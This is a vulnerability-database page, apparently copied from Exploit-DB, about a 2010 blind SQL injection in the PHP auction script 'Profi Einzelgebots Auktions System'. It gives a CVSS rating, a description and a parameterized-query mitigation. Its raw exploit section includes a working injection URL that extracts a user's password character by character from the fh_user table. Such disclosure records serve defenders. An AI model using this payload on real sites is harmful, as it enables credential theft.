header-logo
Suggest Exploit
vendor:
Profi Einzelgebots Auktions System
by:
Easy Laster
8,8
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Profi Einzelgebots Auktions System
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2010

Profi Einzelgebots Auktions System Blind SQL Injection Vulnerability

A vulnerability in Profi Einzelgebots Auktions System allows an attacker to inject malicious SQL commands into the application. This can be exploited to gain access to sensitive information such as passwords from the database. The vulnerability is triggered when an attacker sends a specially crafted HTTP request containing malicious SQL commands to the vulnerable application. The application then processes the request and executes the malicious SQL commands, allowing the attacker to gain access to sensitive information.

Mitigation:

The application should be configured to use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : Profi Einzelgebots Auktions System <= Blind SQL Injection Vulnerability
+Autor : Easy Laster
+Date   : 01.04.2010
+Script  : Profi Einzelgebots Auktions System
+Price : 399.99€
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne.

---------------------------------------------------------------------------------------
                                                                                     
 ___ ___ ___ ___                         _ _           _____           _         _   
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_ 
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|  
                                              |___|                 |___|            


----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/auktion/auktion_text.php?id_auk=

#password
+Exploitable   : http://www.site.com/auktion/auktion_text.php?id_auk=1+and+1=1+and+
ascii(substring((SELECT password FROM fh_user+WHERE+iduser=1 LIMIT 0,1),1,1))>1


-----------------------------------------------------------------------------------------